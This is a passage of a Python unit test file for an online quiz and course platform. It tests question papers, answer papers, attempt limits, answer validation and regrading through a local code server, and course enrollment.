"Trial_orig_id_{}_usermode".format(self.quiz2.id))
self.assertTrue(trial_quiz.is_trial)
self.assertEqual(trial_quiz.duration, self.quiz2.duration)
self.assertEqual(trial_quiz.active, self.quiz2.active)
self.assertEqual(trial_quiz.start_date_time,
self.quiz2.start_date_time
)
self.assertEqual(trial_quiz.end_date_time,
self.quiz2.end_date_time
)
self.assertEqual(trial_quiz.time_between_attempts, 0)
def test_view_answerpaper(self):
self.assertFalse(self.quiz1.view_answerpaper)
self.assertFalse(self.quiz2.view_answerpaper)
# When
self.quiz1.view_answerpaper = True
self.quiz1.save()
# Then
self.assertTrue(self.quiz1.view_answerpaper)
###############################################################################
class QuestionPaperTestCases(unittest.TestCase):
@classmethod
def setUpClass(self):
self.course = Course.objects.get(name="Python Course")
        self.user = User.objects.get(username='creator')
# All active questions
self.questions = Question.objects.filter(active=True, user=self.user)
self.quiz = Quiz.objects.get(description="demo quiz 1")
self.quiz_with_time_between_attempts = Quiz.objects.create(
description="demo quiz with time between attempts",
start_date_time=datetime(2015, 10, 9, 10, 8, 15, 0, tzinfo=pytz.utc),
end_date_time=datetime(2199, 10, 9, 10, 8, 15, 0, tzinfo=pytz.utc),
duration=30, active=True,
attempts_allowed=3, time_between_attempts=1.0,
pass_criteria=0,
instructions="Demo Instructions"
)
# create question paper with only fixed questions
self.question_paper_fixed_questions = QuestionPaper.objects.create(
quiz=self.quiz)
self.question_paper_fixed_questions.fixed_questions.add(
self.questions.get(summary='Q11'), self.questions.get(summary='Q10'))
# create question paper with only random questions
self.question_paper_random_questions = QuestionPaper.objects.create(
quiz=self.quiz)
self.question_set_random = QuestionSet.objects.create(marks=2,
num_questions=2)
self.question_set_random.questions.add(self.questions.get(summary='Q13'),
self.questions.get(summary='Q5'), self.questions.get(summary='Q7'))
self.question_paper_random_questions.random_questions.add(
self.question_set_random)
# create question paper with no questions
self.question_paper_no_questions = QuestionPaper.objects.create(
quiz=self.quiz)
# create question paper
self.question_paper = QuestionPaper.objects.create(quiz=self.quiz,
total_marks=0.0,
shuffle_questions=True
)
self.question_paper_with_time_between_attempts = QuestionPaper.objects.create(
quiz=self.quiz_with_time_between_attempts,
total_marks=0.0,
shuffle_questions=True
)
self.question_paper.fixed_question_order = "{0}, {1}".format(
self.questions[3].id, self.questions[5].id
)
# add fixed set of questions to the question paper
self.question_paper.fixed_questions.add(self.questions[3],
self.questions[5]
)
# create two QuestionSet for random questions
# QuestionSet 1
self.question_set_1 = QuestionSet.objects.create(marks=2,
num_questions=2
)
# add pool of questions for random sampling
self.question_set_1.questions.add(self.questions[6],
self.questions[7],
self.questions[8],
self.questions[9]
)
# add question set 1 to random questions in Question Paper
self.question_paper.random_questions.add(self.question_set_1)
# QuestionSet 2
self.question_set_2 = QuestionSet.objects.create(marks=3,
num_questions=3
)
# add pool of questions
self.question_set_2.questions.add(self.questions[11],
self.questions[12],
self.questions[13],
self.questions[14]
)
# add question set 2
self.question_paper.random_questions.add(self.question_set_2)
# ip address for AnswerPaper
self.ip = '127.0.0.1'
self.user = User.objects.get(username="creator")
self.attempted_papers = AnswerPaper.objects.filter(
question_paper=self.question_paper,
user=self.user
)
# For Trial case
self.questions_list = [self.questions[3].id, self.questions[5].id]
self.trial_course = Course.objects.create_trial_course(self.user)
self.trial_quiz = Quiz.objects.create_trial_quiz(self.user)
def test_get_question_bank(self):
# Given
summaries = ['Q11', 'Q10']
questions = list(Question.objects.filter(summary__in=summaries))
# When
question_bank = self.question_paper_fixed_questions.get_question_bank()
# Then
self.assertSequenceEqual(questions, question_bank)
# Given
        summaries = ['Q13', 'Q5', 'Q7']
questions = list(Question.objects.filter(summary__in=summaries))
# When
question_bank = self.question_paper_random_questions.get_question_bank()
# Then
self.assertSequenceEqual(questions, question_bank)
# Given
questions = []
# When
question_bank = self.question_paper_no_questions.get_question_bank()
# Then
self.assertSequenceEqual(questions, question_bank)
def test_questionpaper(self):
""" Test question paper"""
self.assertEqual(self.question_paper.quiz.description, 'demo quiz 1')
self.assertSequenceEqual(self.question_paper.fixed_questions.all(),
[self.questions[3], self.questions[5]]
)
self.assertTrue(self.question_paper.shuffle_questions)
def test_update_total_marks(self):
""" Test update_total_marks() method of Question Paper"""
self.assertEqual(self.question_paper.total_marks, 0)
self.question_paper.update_total_marks()
self.assertEqual(self.question_paper.total_marks, 15)
def test_get_random_questions(self):
""" Test get_random_questions() method of Question Paper"""
random_questions_set_1 = self.question_set_1.get_random_questions()
random_questions_set_2 = self.question_set_2.get_random_questions()
total_random_questions = len(random_questions_set_1 + \
random_questions_set_2)
self.assertEqual(total_random_questions, 5)
# To check whether random questions are from random_question_set
questions_set_1 = set(self.question_set_1.questions.all())
random_set_1 = set(random_questions_set_1)
random_set_2 = set(random_questions_set_2)
boolean = questions_set_1.intersection(random_set_1) == random_set_1
self.assertTrue(boolean)
self.assertEqual(len(random_set_1), 2)
# To check that the questions are random.
        # If by chance they are not random, check that the order is different.
try:
self.assertFalse(random_set_1 == random_set_2)
except AssertionError:
self.assertTrue(random_questions_set_1 != random_questions_set_2)
def test_make_answerpaper(self):
""" Test make_answerpaper() method of Question Paper"""
already_attempted = self.attempted_papers.count()
attempt_num = already_attempted + 1
answerpaper = self.question_paper.make_answerpaper(self.user, self.ip,
attempt_num,
self.course.id)
self.assertIsInstance(answerpaper, AnswerPaper)
paper_questions = answerpaper.questions.all()
self.assertEqual(len(paper_questions), 7)
fixed_questions = set(self.question_paper.fixed_questions.all())
self.assertTrue(fixed_questions.issubset(set(paper_questions)))
answerpaper.passed = True
answerpaper.save()
# test can_attempt_now(self):
result = (False, u'You cannot attempt demo quiz 1 quiz more than 1 time(s)')
self.assertEquals(
self.question_paper.can_attempt_now(self.user, self.course.id), result
)
# trying to create an answerpaper with same parameters passed.
answerpaper2 = self.question_paper.make_answerpaper(self.user, self.ip,
attempt_num,
self.course.id)
# check if make_answerpaper returned an object instead of creating one.
self.assertEqual(answerpaper, answerpaper2)
def test_time_between_attempt(self):
""" Test make_answerpaper() method of Question Paper"""
already_attempted = self.attempted_papers.count()
attempt_num = 1
self.first_start_time = timezone.now()
self.first_end_time = self.first_start_time + timedelta(minutes=20)
self.second_start_time = self.first_start_time + timedelta(minutes=30)
self.second_end_time = self.second_start_time + timedelta(minutes=20)
# create answerpaper
self.first_answerpaper = AnswerPaper(
user=self.user,
question_paper=self.question_paper_with_time_between_attempts,
start_time=self.first_start_time,
end_time=self.first_end_time,
user_ip=self.ip,
course=self.course,
attempt_number=attempt_num
)
self.first_answerpaper.passed = True
self.first_answerpaper.save()
self.second_answerpaper = AnswerPaper(
user=self.user,
question_paper=self.question_paper_with_time_between_attempts,
start_time=self.second_start_time,
end_time=self.second_end_time,
user_ip=self.ip,
course=self.course,
attempt_number=attempt_num + 1
)
self.second_answerpaper.passed = True
self.second_answerpaper.save()
result = (False, u'You cannot start the next attempt for this quiz before 1.0 hour(s)')
self.assertEquals(
self.question_paper_with_time_between_attempts.can_attempt_now(self.user, self.course.id), result
)
def test_create_trial_paper_to_test_quiz(self):
qu_list = [str(self.questions_list[0]), str(self.questions_list[1])]
        trial_paper = QuestionPaper.objects.create_trial_paper_to_test_quiz(
            self.trial_quiz, self.quiz.id
        )
trial_paper.random_questions.add(self.question_set_1)
trial_paper.random_questions.add(self.question_set_2)
trial_paper.fixed_question_order = ",".join(qu_list)
self.assertEqual(trial_paper.quiz, self.trial_quiz)
self.assertSequenceEqual(trial_paper.get_ordered_questions(),
self.question_paper.get_ordered_questions()
)
trial_paper_ran = [q_set.id for q_set in
trial_paper.random_questions.all()]
qp_ran = [q_set.id for q_set in
self.question_paper.random_questions.all()]
self.assertSequenceEqual(trial_paper_ran, qp_ran)
def test_create_trial_paper_to_test_questions(self):
qu_list = [str(self.questions_list[0]), str(self.questions_list[1])]
trial_paper = QuestionPaper.objects.\
create_trial_paper_to_test_questions(
self.trial_quiz, qu_list
)
self.assertEqual(trial_paper.quiz, self.trial_quiz)
fixed_q = self.question_paper.fixed_questions.values_list(
'id', flat=True)
self.assertSequenceEqual(self.questions_list, fixed_q)
def test_fixed_order_questions(self):
fixed_ques = self.question_paper.get_ordered_questions()
actual_ques = [self.questions[3], self.questions[5]]
self.assertSequenceEqual(fixed_ques, actual_ques)
###############################################################################
class AnswerPaperTestCases(unittest.TestCase):
@classmethod
def setUpClass(self):
self.course = Course.objects.get(name="Python Course")
self.ip = '101.0.0.1'
self.user = User.objects.get(username='creator')
self.user2 = User.objects.get(username='demo_user2')
self.profile = self.user.profile
self.quiz = Quiz.objects.get(description='demo quiz 1')
self.question_paper = QuestionPaper(quiz=self.quiz, total_marks=3)
self.question_paper.save()
self.quiz2 = Quiz.objects.get(description='demo quiz 2')
self.qtn_paper_with_single_question = QuestionPaper(
quiz=self.quiz2, total_marks=3
)
self.qtn_paper_with_single_question.save()
all_questions = Question.objects.filter(user=self.user).order_by("id")
self.questions = all_questions[0:3]
self.start_time = timezone.now()
self.end_time = self.start_time + timedelta(minutes=20)
self.question1 = all_questions[0]
self.question2 = all_questions[1]
self.question3 = all_questions[2]
self.question4 = all_questions[3]
# create answerpaper
self.answerpaper = AnswerPaper(user=self.user,
question_paper=self.question_paper,
start_time=self.start_time,
end_time=self.end_time,
user_ip=self.ip,
course=self.course
)
self.attempted_papers = AnswerPaper.objects.filter(
question_paper=self.question_paper,
user=self.user
)
self.question_paper.fixed_questions.add(*self.questions)
already_attempted = self.attempted_papers.count()
self.answerpaper.attempt_number = already_attempted + 1
self.answerpaper.save()
self.answerpaper.questions.add(*self.questions)
self.answerpaper.questions_order = ",".join(
[str(q.id) for q in self.questions]
)
self.answerpaper.questions_unanswered.add(*self.questions)
self.answerpaper.save()
# answers for the Answer Paper
self.answer_right = Answer(question=self.question1,
answer="Demo answer",
correct=True, marks=1,
error=json.dumps([])
)
self.answer_wrong = Answer(question=self.question2,
answer="My answer",
correct=False,
marks=0,
error=json.dumps(['error1', 'error2'])
)
self.answer_right.save()
self.answer_wrong.save()
self.answerpaper.answers.add(self.answer_right)
self.answerpaper.answers.add(self.answer_wrong)
self.answer1 = Answer.objects.create(
question=self.question1,
answer="answer1", correct=False, error=json.dumps([])
)
self.answerpaper.answers.add(self.answer1)
# create an answerpaper with only one question
self.answerpaper_single_question = AnswerPaper(user=self.user,
question_paper=self.question_paper,
start_time=self.start_time,
end_time=self.end_time,
user_ip=self.ip
)
self.attempted_papers = AnswerPaper.objects.filter(
question_paper=self.question_paper,
user=self.user
)
self.qtn_paper_with_single_question.fixed_questions.add(self.question4)
already_attempted = self.attempted_papers.count()
self.answerpaper_single_question.attempt_number = already_attempted + 1
self.answerpaper_single_question.save()
self.answerpaper_single_question.questions.add(self.question4)
self.answerpaper_single_question.questions_unanswered.add(self.question4)
self.answerpaper_single_question.save()
# answers for the Answer Paper
self.single_answer = Answer(question=self.question4,
answer="Demo answer",
correct=True, marks=1,
error=json.dumps([])
)
self.single_answer.save()
self.answerpaper_single_question.answers.add(self.single_answer)
self.question1.language = 'python'
self.question1.test_case_type = 'standardtestcase'
self.question1.summary = "Q1"
self.question1.save()
self.question2.language = 'python'
self.question2.type = 'mcq'
self.question2.test_case_type = 'mcqtestcase'
self.question2.summary = "Q2"
self.question2.save()
self.question3.language = 'python'
self.question3.type = 'mcc'
self.question3.test_case_type = 'mcqtestcase'
self.question3.summary = "Q3"
self.question3.save()
self.assertion_testcase = StandardTestCase(
question=self.question1,
test_case='assert add(1, 3) == 4',
            type='standardtestcase'
)
self.assertion_testcase.save()
self.mcq_based_testcase = McqTestCase(
            options='a',
            question=self.question2,
            correct=True,
            type='mcqtestcase'
)
self.mcq_based_testcase.save()
self.mcc_based_testcase = McqTestCase(
question=self.question3,
            options='a',
            correct=True,
            type='mcqtestcase'
)
self.mcc_based_testcase.save()
# Setup quiz where questions are shuffled
# Create Quiz and Question Paper
self.quiz2 = Quiz.objects.get(description="demo quiz 2")
self.question_paper2 = QuestionPaper(
quiz=self.quiz2, total_marks=3, shuffle_questions=True)
self.question_paper2.save()
summary_list = ['Q%d' % (i) for i in range(1, 21)]
self.que_list = Question.objects.filter(summary__in=summary_list)
self.question_paper2.fixed_questions.add(*self.que_list)
# Create AnswerPaper for user1 and user2
self.user1_answerpaper = self.question_paper2.make_answerpaper(
self.user, self.ip, 1, self.course.id
)
self.user2_answerpaper = self.question_paper2.make_answerpaper(
self.user2, self.ip, 1, self.course.id
)
self.user2_answerpaper2 = self.question_paper.make_answerpaper(
self.user2, self.ip, 1, self.course.id
)
settings.code_evaluators['python']['standardtestcase'] = \
"yaksh.python_assertion_evaluator.PythonAssertionEvaluator"
self.SERVER_POOL_PORT = 4000
server_pool = ServerPool(n=1, pool_port=self.SERVER_POOL_PORT)
self.server_pool = server_pool
self.server_thread = t = Thread(target=server_pool.run)
t.start()
@classmethod
def tearDownClass(self):
self.server_pool.stop()
self.server_thread.join()
settings.code_evaluators['python']['standardtestcase'] = \
"python_assertion_evaluator.PythonAssertionEvaluator"
def test_get_per_question_score(self):
# Given
question_id = self.question4.id
expected_score = 1
# When
score = self.answerpaper_single_question.get_per_question_score(question_id)
# Then
self.assertEqual(score, expected_score)
# Given
question_id = self.question2.id
expected_score = 0
# When
score = self.answerpaper.get_per_question_score(question_id)
# Then
self.assertEqual(score, expected_score)
# Given
question_id = 131
expected_score = 'NA'
# When
score = self.answerpaper.get_per_question_score(question_id)
# Then
self.assertEqual(score, expected_score)
def test_returned_question_is_not_none(self):
# Test add_completed_question and next_question
# When all questions are answered
# Before questions are answered
self.assertEqual(self.answerpaper_single_question.questions_left(), 1)
current_question = self.answerpaper_single_question.add_completed_question(
self.question4.id
)
# Then
self.assertEqual(
self.answerpaper_single_question.questions_answered.all()[0],
self.question4
)
self.assertEqual(self.answerpaper_single_question.questions_left(), 0)
self.assertIsNotNone(current_question)
self.assertEqual(current_question.summary, "Q4")
# When
next_question = self.answerpaper_single_question.next_question(
self.question4.id
)
# Then
self.assertEqual(self.answerpaper_single_question.questions_left(), 0)
self.assertIsNotNone(next_question)
self.assertEqual(next_question.summary, "Q4")
# When
current_question = self.answerpaper_single_question.get_current_question(
self.answerpaper_single_question.questions.all()
)
# Then
self.assertEqual(self.answerpaper_single_question.questions_left(), 0)
self.assertIsNotNone(current_question)
self.assertEqual(current_question.summary, "Q4")
def test_validate_and_regrade_mcc_correct_answer(self):
# Given
mcc_answer = [str(self.mcc_based_testcase.id)]
self.answer = Answer(question=self.question3,
answer=mcc_answer,
)
self.answer.save()
self.answerpaper.answers.add(self.answer)
# When
json_data = None
result = self.answerpaper.validate_answer(mcc_answer,
self.question3, json_data
)
# Then
self.assertTrue(result['success'])
self.assertEqual(result['error'], ['Correct answer'])
self.answer.correct = True
self.answer.marks = 1
# Given
self.answer.correct = True
self.answer.marks = 1
self.answer.answer = ['a', 'b']
self.answer.save()
# When
details = self.answerpaper.regrade(self.question3.id)
# Then
self.answer = self.answerpaper.answers.filter(
question=self.question3).last()
self.assertTrue(details[0])
self.assertEqual(self.answer.marks, 0)
self.assertFalse(self.answer.correct)
def test_validate_and_regrade_code_correct_answer(self):
# Given
# Start code server
user_answer = dedent("""\
def add(a,b):
return a+b
""")
self.answer = Answer(question=self.question1,
answer=user_answer,
)
self.answer.save()
self.answerpaper.answers.add(self.answer)
user = self.answerpaper.user
# When
json_data = self.question1.consolidate_answer_data(user_answer,
user
)
get_result = self.answerpaper.validate_answer(user_answer,
self.question1,
json_data,
self.answer.id,
self.SERVER_POOL_PORT
)
url = 'http://localhost:%s' % self.SERVER_POOL_PORT
        check_result = get_result_from_code_server(url, get_result['uid'],
block=True
)
result = json.loads(check_result.get('result'))
# Then
self.assertTrue(result['success'])
self.answer.correct = True
self.answer.marks = 1
# Regrade
# Given
self.answer.correct = True
self.answer.marks = 1
self.answer.answer = dedent("""
def add(a,b):
return a-b
""")
self.answer.save()
# When
details = self.answerpaper.regrade(self.question1.id,
self.SERVER_POOL_PORT
)
# Then
self.answer = self.answerpaper.answers.filter(question=self.question1
).last()
self.assertTrue(details[0])
self.assertEqual(self.answer.marks, 0)
self.assertFalse(self.answer.correct)
def test_validate_and_regrade_mcq_correct_answer(self):
# Given
mcq_answer = str(self.mcq_based_testcase.id)
self.answer = Answer(question=self.question2,
answer=mcq_answer,
)
self.answer.save()
self.answerpaper.answers.add(self.answer)
# When
json_data = None
result = self.answerpaper.validate_answer(mcq_answer,
self.question2, json_data
)
# Then
self.assertTrue(result['success'])
self.answer.correct = True
self.answer.marks = 1
# Given
self.answer.correct = True
self.answer.marks = 1
self.answer.answer = 'b'
self.answer.save()
# When
details = self.answerpaper.regrade(self.question2.id)
# Then
self.answer = self.answerpaper.answers.filter(question=self.question2).last()
self.assertTrue(details[0])
self.assertEqual(self.answer.marks, 0)
self.assertFalse(self.answer.correct)
def test_mcq_incorrect_answer(self):
# Given
mcq_answer = 'b'
self.answer = Answer(question=self.question2,
answer=mcq_answer,
)
self.answer.save()
self.answerpaper.answers.add(self.answer)
# When
json_data = None
result = self.answerpaper.validate_answer(mcq_answer,
self.question2, json_data
)
# Then
self.assertFalse(result['success'])
def test_mcc_incorrect_answer(self):
# Given
mcc_answer = ['b']
self.answer = Answer(question=self.question3,
answer=mcc_answer,
)
self.answer.save()
self.answerpaper.answers.add(self.answer)
# When
json_data = None
result = self.answerpaper.validate_answer(mcc_answer,
self.question3, json_data
)
# Then
self.assertFalse(result['success'])
def test_answerpaper(self):
""" Test Answer Paper"""
self.assertEqual(self.answerpaper.user.username, 'creator')
self.assertEqual(self.answerpaper.user_ip, self.ip)
questions = [q.id for q in self.answerpaper.get_questions()]
num_questions = len(questions)
self.assertEqual(set(questions), set([q.id for q in self.questions]))
self.assertEqual(num_questions, 3)
self.assertEqual(self.answerpaper.question_paper, self.question_paper)
self.assertEqual(self.answerpaper.start_time, self.start_time)
self.assertEqual(self.answerpaper.status, 'inprogress')
def test_questions(self):
# Test questions_left() method of Answer Paper
self.assertEqual(self.answerpaper.questions_left(), 3)
# Test current_question() method of Answer Paper
current_question = self.answerpaper.current_question()
self.assertEqual(current_question.summary, "Q1")
# Test completed_question() method of Answer Paper
question = self.answerpaper.add_completed_question(self.question1.id)
self.assertIsNotNone(question)
self.assertEqual(self.answerpaper.questions_left(), 2)
# Test next_question() method of Answer Paper
current_question = self.answerpaper.current_question()
self.assertEqual(current_question.summary, "Q2")
# When
next_question_id = self.answerpaper.next_question(current_question.id)
# Then
self.assertTrue(next_question_id is not None)
self.assertEqual(next_question_id.summary, "Q3")
# Given, here question is already answered
current_question_id = self.question1.id
# When
next_question_id = self.answerpaper.next_question(current_question_id)
# Then
self.assertTrue(next_question_id is not None)
self.assertEqual(next_question_id.summary, "Q2")
# Given, wrong question id
current_question_id = 12
# When
next_question_id = self.answerpaper.next_question(current_question_id)
# Then
self.assertTrue(next_question_id is not None)
self.assertEqual(next_question_id.summary, "Q1")
# Given, last question in the list
current_question_id = self.question3.id
# When
next_question_id = self.answerpaper.next_question(current_question_id)
# Then
self.assertTrue(next_question_id is not None)
self.assertEqual(next_question_id.summary, "Q1")
# Test get_questions_answered() method
# When
questions_answered = self.answerpaper.get_questions_answered()
# Then
self.assertEqual(questions_answered.count(), 1)
self.assertSequenceEqual(questions_answered, [self.questions[0]])
# When
questions_unanswered = self.answerpaper.get_questions_unanswered()
# Then
self.assertEqual(questions_unanswered.count(), 2)
self.assertEqual(set([q.id for q in questions_unanswered]),
set([self.questions[1].id,
self.questions[2].id]
)
)
# Test completed_question and next_question
# When all questions are answered
current_question = self.answerpaper.add_completed_question(
self.question2.id
)
# Then
self.assertEqual(self.answerpaper.questions_left(), 1)
self.assertIsNotNone(current_question)
self.assertEqual(current_question.summary, "Q3")
# When
current_question = self.answerpaper.add_completed_question(
self.question3.id
)
# Then
self.assertEqual(self.answerpaper.questions_left(), 0)
self.assertIsNotNone(current_question)
self.assertTrue(current_question == self.answerpaper.get_all_ordered_questions()[0])
# When
next_question_id = self.answerpaper.next_question(current_question_id)
# Then
all_questions = self.questions.all()
self.assertTrue(next_question_id == all_questions[0])
def test_update_marks(self):
""" Test update_marks method of AnswerPaper"""
self.answerpaper.update_marks('inprogress')
self.assertEqual(self.answerpaper.status, 'inprogress')
self.assertTrue(self.answerpaper.is_attempt_inprogress())
self.answerpaper.update_marks()
self.assertEqual(self.answerpaper.status, 'completed')
self.assertEqual(self.answerpaper.marks_obtained, 1.0)
self.assertEqual(self.answerpaper.percent, 33.33)
self.assertTrue(self.answerpaper.passed)
self.assertFalse(self.answerpaper.is_attempt_inprogress())
def test_set_end_time(self):
current_time = timezone.now()
self.answerpaper.set_end_time(current_time)
self.assertEqual(self.answerpaper.end_time,current_time)
def test_get_question_answer(self):
""" Test get_question_answer() method of Answer Paper"""
questions = self.answerpaper.questions.all()
answered = self.answerpaper.get_question_answers()
for question in questions:
answers_saved = Answer.objects.filter(question=question)
error_list = [json.loads(ans.error) for ans in answers_saved]
if answers_saved:
self.assertEqual(len(answered[question]), len(answers_saved))
ans = []
err = []
for val in answered[question]:
ans.append(val.get('answer'))
err.append(val.get('error_list'))
self.assertEqual(set(ans), set(answers_saved))
self.assertEqual(error_list, err)
def test_is_answer_correct(self):
self.assertTrue(self.answerpaper.is_answer_correct(self.questions[0]))
self.assertFalse(self.answerpaper.is_answer_correct(self.questions[1]))
def test_get_previous_answers(self):
answers = self.answerpaper.get_previous_answers(self.questions[0])
self.assertEqual(answers.count(), 2)
self.assertTrue(answers[0], self.answer_right)
answers = self.answerpaper.get_previous_answers(self.questions[1])
self.assertEqual(answers.count(), 1)
self.assertTrue(answers[0], self.answer_wrong)
def test_set_marks(self):
self.answer_wrong.set_marks(0.5)
self.assertEqual(self.answer_wrong.marks, 0.5)
self.answer_wrong.set_marks(10.0)
self.assertEqual(self.answer_wrong.marks, 1.0)
def test_get_latest_answer(self):
latest_answer = self.answerpaper.get_latest_answer(self.question1.id)
self.assertEqual(latest_answer.id, self.answer1.id)
self.assertEqual(latest_answer.answer, "answer1")
def test_shuffle_questions(self):
ques_set_1 = self.user1_answerpaper.get_all_ordered_questions()
ques_set_2 = self.user2_answerpaper.get_all_ordered_questions()
self.assertFalse(ques_set_1 == ques_set_2)
def test_validate_current_question(self):
self.user2_answerpaper2.questions_unanswered.remove(*self.questions)
self.assertEqual(self.user2_answerpaper2.current_question(),
self.question1)
def test_duplicate_attempt_answerpaper(self):
with self.assertRaises(IntegrityError):
new_answerpaper = AnswerPaper.objects.create(
user=self.answerpaper.user,
question_paper=self.answerpaper.question_paper,
attempt_number=self.answerpaper.attempt_number,
start_time=self.answerpaper.start_time,
end_time=self.answerpaper.end_time,
course=self.answerpaper.course
)
###############################################################################
class CourseTestCases(unittest.TestCase):
def setUp(self):
self.course = Course.objects.get(name="Python Course")
self.creator = User.objects.get(username="creator")
self.template_course_user = User.objects.get(username="demo_user4")
self.student = User.objects.get(username="course_user")
self.student1 = User.objects.get(username="demo_user2")
self.student2 = User.objects.get(username="demo_user3")
self.quiz1 = Quiz.objects.get(description='demo quiz 1')
self.quiz2 = Quiz.objects.get(description='demo quiz 2')
self.questions = Question.objects.filter(active=True,
user=self.creator
)
self.modules = LearningModule.objects.filter(creator=self.creator)
# create courses with disabled enrollment
self.enroll_request_course = Course.objects.create(
name="Enrollment Request Course With Enrollment Disabled",
enrollment="Enroll Request",
creator=self.creator,
start_enroll_time=datetime(2015, 10, 9, 10, 8, 15, 0,
tzinfo=pytz.utc
),
end_enroll_time=datetime(2015, 11, 9, 10, 8, 15, 0,
tzinfo=pytz.utc
),
)
self.open_course = Course.objects.create(
name="Open Course With Enrollment Disabled",
enrollment="Open Course",
creator=self.creator,
start_enroll_time=datetime(2015, 10, 9, 10, 8, 15, 0,
tzinfo=pytz.utc
),
end_enroll_time=datetime(2015, 11, 9, 10, 8, 15, 0,
tzinfo=pytz.utc
),
)
# create a course that will be cloned
self.template_course = Course.objects.create(
name="Template Course to clone",
enrollment="Open Course",
creator=self.creator,
start_enroll_time=datetime(2015, 10, 9, 10, 8, 15, 0,
tzinfo=pytz.utc
),
end_enroll_time=datetime(2015, 11, 9, 10, 8, 15, 0,
tzinfo=pytz.utc
),
)
self.template_quiz = Quiz.objects.create(
start_date_time=datetime(2014, 10, 9, 10, 8, 15, 0,
tzinfo=pytz.utc
),
end_date_time=datetime(2015, 10, 9, 10, 8, 15, 0,
tzinfo=pytz.utc
),
duration=30,
active=False,
attempts_allowed=-1,
time_between_attempts=0,
description='template quiz 1',
pass_criteria=40,
instructions="Demo Instructions"
)
self.template_question_paper = QuestionPaper.objects.create(
quiz=self.template_quiz,
total_marks=0.0,
shuffle_questions=True
)
self.template_question_paper.fixed_questions.add(self.questions[1],
self.questions[2],
self.questions[3]
)
self.template_quiz2 = Quiz.objects.create(
start_date_time=datetime(2015, 10, 9, 10, 8, 15, 0, tzinfo=pytz.utc),
end_date_time=datetime(2199, 10, 9, 10, 8, 15, 0, tzinfo=pytz.utc),
duration=30,
active=True,
attempts_allowed=1,
time_between_attempts=0,
pass_criteria=0,
instructions="Demo Instructions"
)
self.template_question_paper2 = QuestionPaper.objects.create(
quiz=self.template_quiz2,
total_marks=0.0,
shuffle_questions=True
)
self.template_question_paper2.fixed_questions.add(self.questions[1],
self.questions[2],
self.questions[3]
)
def test_get_learning_modules(self):
# Given
modules = list(self.modules)
# When
course_modules = self.course.get_learning_modules()
# Then
self.assertSequenceEqual(list(course_modules), modules)
# Given
modules = list(self.modules.filter(name='LM1'))
module_to_remove = self.modules.get(name='LM2')
# When
self.course.learning_module.remove(module_to_remove)
course_modules = self.course.get_learning_modules()
# Then
self.assertSequenceEqual(list(course_modules), modules)
def test_get_quizzes(self):
# Given
quizzes = [self.quiz1]
# When
course_quizzes = self.course.get_quizzes()
# Then
self.assertSequenceEqual(course_quizzes, quizzes)
def test_get_learning_units(self):
# Given
lesson = Lesson.objects.get(name='L1')
self.learning_unit_one = LearningUnit.objects.get(order=1,
lesson=lesson)
self.learning_unit_two = LearningUnit.objects.get(order=2,
quiz=self.quiz1)
learning_units = [self.learning_unit_one, self.learning_unit_two]
# When
course_learning_units = self.course.get_learning_units()
# Then
self.assertSequenceEqual(course_learning_units, learning_units)
def test_is_creator(self):
""" Test is_creator method of Course"""
self.assertTrue(self.course.is_creator(self.creator))
def test_is_self_enroll(self):
""" Test is_self_enroll method of Course"""
self.assertFalse(self.course.is_self_enroll())
def test_deactivate(self):
""" Test deactivate method of Course"""
self.course.deactivate()
self.assertFalse(self.course.active)
def test_activate(self):
""" Test activate method of Course"""
self.course.activate()
self.assertTrue(self.course.active)
def test_request(self):
""" Test request and get_requests methods of Course"""
self.course.request(self.student1, self.student2)
self.assertSequenceEqual(self.course.get_requests(),
[self.student1, self.student2])
def test_enroll_reject(self):
""" Test enroll, reject, get_enrolled and get_rejected methods"""
self.assertSequenceEqual(self.course.get_enrolled(), [self.student])
was_rejected = False
self.course.enroll(was_rejected, self.student1)
self.assertSequenceEqual(self.course.get_enrolled(),
[self.student1, self.student])
self.assertSequenceEqual(self.course.get_rejected(), [])
was_enrolled = False
self.course.reject(was_enrolled, self.student2)
self.assertSequenceEqual(self.course.get_rejected(), [self.student2])
was_rejected = True
self.course.enroll(was_rejected, self.student2)
self.assertSequenceEqual(self.course.get_enrolled(),
[self.student1, self.student2, self.student])
self.assertSequenceEqual(self.course.get_rejected(), [])
was_enrolled = True
self.course.reject(was_enrolled, self.student2)
self.assertSequenceEqual(self.course.get_rejected(), [self.student2])
self.assertSequenceEqual(self.course.get_enrolled(),
[self.student1, self.student])
self.assertTrue(self.course.is_enrolled(self.student1))
def test_add_teachers(self):
""" Test to add teachers to a course"""
self.course.add_teachers(self.student1, self.student2)
self.assertSequenceEqual(self.course.get_teachers(),
[self.student1, self.student2])
def test_remove_teachers(self):
""" Test to remove teachers from a course"""
self.course.add_teachers(self.student1, self.student2)
self.course.remove_teachers(self.student1)
self.assertSequenceEqual(self.course.get_teachers(), [self.student2])
def test_is_teacher(self):
""" Test to check if user is teacher"""
self.course.add_teachers(self.student2)
result = self.course.is_teacher(self.student2)
self.assertTrue(result)
def test_create_trial_course(self):
"""Test to check if trial course is created"""
trial_course = Course.objects.create_trial_course(self.creator)
self.assertEqual(trial_course.name, "trial_course")
self.assertEqual(trial_course.enrollment, "open")
self.assertTrue(trial_course.active)
self.assertEqual(self.creator, trial_course.creator)
self.assertIn(self.creator, trial_course.students.all())
self.assertTrue(trial_course.is_trial)
def test_enabled_enrollment_for_course(self):
"""Test to check enrollment is closed for open course"""
self.assertTrue(self.course.is_active_enrollment())
def test_disabled_enrollment_for_open_course(self):
"""Test to check enrollment is closed for open course"""
self.assertFalse(self.open_course.is_active_enrollment())
def test_disabled_enrollment_for_enroll_request_course(self):
"""Test to check enrollment is closed for open course"""
self.assertFalse(self.enroll_request_course.is_active_enrollment())
def test_course_complete_percent(self):
# for course with no modules
self.no_module_course = Course.objects.create(
name="test_course", creator=self.creator, enrollment="open")
percent = self.course.percent_completed(self.student1)
self.assertEqual(percent, 0)
# for course with module but zero percent completed
percent = self.course.percent_completed(self.student1)
self.assertEqual(percent, 0)
# Add completed unit to course status and check percent
lesson = Lesson.objects.get(name='L1')
self.completed_unit = LearningUnit.objects.get(lesson=lesson)
course_status = CourseStatus.objects.create(
course=self.course, user=self.student1)
course_status.completed_units.add(self.completed_unit)
updated_percent = self.course.percent_completed(self.student1)
self.assertEqual(updated_percent, 25)
def test_course_time_remaining_to_start(self):
# check if course has 0 days left to start
self.assertEqual(self.course.days_before_start(), 0)
# check if course has some days left to start
course_time = self.course.start_enroll_time
self.course.start_enroll_time = datetime(
2199, 12, 31, 10, 8, 15, 0,
tzinfo=pytz.utc
)
self.course.save()
updated_course = Course.objects.get(id=self.course.id)
